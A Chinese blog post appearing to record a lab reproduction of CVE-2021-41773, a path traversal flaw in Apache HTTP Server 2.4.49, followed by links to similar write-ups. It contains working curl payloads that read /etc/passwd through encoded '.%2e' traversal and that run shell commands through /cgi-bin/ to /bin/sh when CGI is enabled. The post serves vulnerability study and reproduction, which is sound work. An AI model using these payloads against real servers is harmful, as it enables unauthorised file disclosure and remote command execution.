CVE-2021-41773/Apache HTTP Server 路径穿越漏洞

于 2021-10-08 02:29:05 发布 3885 收藏 1
分类专栏: 漏洞复现 文章标签: CVE-2021-41773
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/120643710
版权

自己的一次简单的漏洞复现记录

学习请移步:https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md

满足以上两个条件即可造成路径穿越,可以进行任意文件读取
注意:这里的/icons/必须是一个存在且可访问的目录
payload

curl -v --path-as-is http://your-ip:your-port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述
在服务端开启了cgicgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:
在这里插入图片描述
ScriptAliasAlias指令非常相似,都是定义了映射到一个特定目录的URL前缀,两者一般都用于指定位于DocumentRoot以外的目录,其不同之处是ScriptAlias又多了一层含义,即URL前缀后面的任何文件都被视为CGI程序。所以,上述配置会指示Apache任何以/cgi-bin/开头的资源都将映射到/usr/local/apache2/cgi-bin/目录中,且视之为CGI程序

payload

curl --data "echo;id" 'http://your-ip:your-port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

在这里插入图片描述

/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh

echo;cat /etc/passwd

在这里插入图片描述

末初mochu7
关注
  • 2
    点赞
  • 1
    收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)
zzzzz1284的博客
01-09 57
CVE-2021-41773复现
修复路径穿越、任意文件写入漏洞
InterestAndFun的博客
02-23 600
前段时间随手写的一个文件上传服务,在公司的渗透测试下漏洞百出,其中少不了路径穿越和任意文件写入漏洞。其实这两个漏洞的修复并不复杂,只要对入参进行两个条件的校验就可以了。
CVE-2021-41773目录遍历(文件穿越漏洞复现
qq_59826623的博客
10-11 888
CVE-202141773目录遍历(文件穿越漏洞 Linux环境下 进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。 等待文件下载…… 安装完成后重启服务 访问本地的8080端口 打开Burpsuite,构造get参数 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 转换为post参数 修改命令为POST /cgi-bin/.%2e/%2e
CVE-2021-41773漏洞复现
dreamthe的博客
10-18 5160
1.安装debian系统 首先我选择的系统是debian10版本,也可以在别的系统完成复现,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。 1.创建虚拟机,点击下一步。 导入镜像 自己选安装的位置以及虚拟机的名称。 安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了 这里选择了第二个。 因为之前我们选择了lvm,那么这里选择是就可以了 因为我们需要一个简单系统,所有只选择了下面三个安装软件 中间少的部分就是一直点击继续就可..
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 2191
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
Apache HTTP Server2.4.50中的路径遍历和命令执行漏洞(CVE-2021-41773 & CVE-2021-42013)
weixin_63231007的博客
10-15 606
漏洞是由于在 Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。
Apache HTTP Server路径穿越漏洞 (CVE-2021-41773)
kukudeshuo的博客
01-19 5513
Apache HTTP Server路径穿越漏洞 (CVE-2021-41773) 漏洞描述 攻击者可以使用路径遍历攻击将URL映射到预期文档根以外的文件。如果文档根目录以外的文件不受require all denied保护,则攻击者可以访问这些文件。 CVE编号 CVE-2021-41773 漏洞影响范围 仅影响Apache HTTP Server 2.4.49版本 漏洞评级 高危 漏洞复现 环境搭建 这里用github的项目进行漏洞复现 项目下载地址:https://github.com/blasty/
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
weixin_48400575的博客
02-13 3523
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
Apache HTTP Server路径穿越漏洞复现(CVE-2021-41773)
小小猪的博客
10-26 1702
sudo docker pull blueteamsteve/cve-2021-41773:no-cgid sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
weixin_45260839的博客
06-03 3870
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
CVE-2021-41773 && CVE-2021-42013 Apache HTTPd最新RCE漏洞复现 && 目录穿越漏洞
weixin_45694388的博客
10-16 2922
漏洞描述: Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制
Apache HTTP Server路径遍历漏洞复现0day(CVE-2021-41773|CVE-2021-42013远程代码执行)
yy
10-09 4278
声明:请勿用于非法入侵,仅供检测与学习!传送门 ——>中华人民共和国网络安全法 漏洞描述 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功。此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。 fofa查询:server=.
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 1408
ApacheHTTPServerApache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
中间件漏洞 | Apache-路径穿越/任意命令执行
weixin_52116519的博客
11-02 268
Apache HTTP Server 2.4.49 路径穿越漏洞Apache HTTP ServerApache基金会开源的一款流行的HTTP服务器。在其2.4.49版本版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
Apache HTTP Server漏洞CVE-2021-41773
weixin_44769042的博客
10-26 3753
漏洞复现记录--1 搭建环境 容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用: dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问:ip:8080
Apache CVE-2021-41773漏洞复现
3tefanie丶zhou的博客
10-11 1210
漏洞简介 Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服
Apache Log4j 远程代码执行漏洞(CVE-2021-44832) /elasticsearch-6.5.2
最新发布
03-08
我可以回答这个问题。Apache Log4j 远程代码执行漏洞(CVE-2021-44832)是一种安全漏洞,可能允许攻击者远程执行恶意代码。该漏洞影响的版本包括 Log4j 2.-beta9 到 2.14.1,如果您使用这些版本的 Log4j,请尽快升级到最新版本。此外,如果您使用 Elasticsearch 6.5.2,请注意该版本中包含了受影响的 Log4j 版本,因此也需要进行升级。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值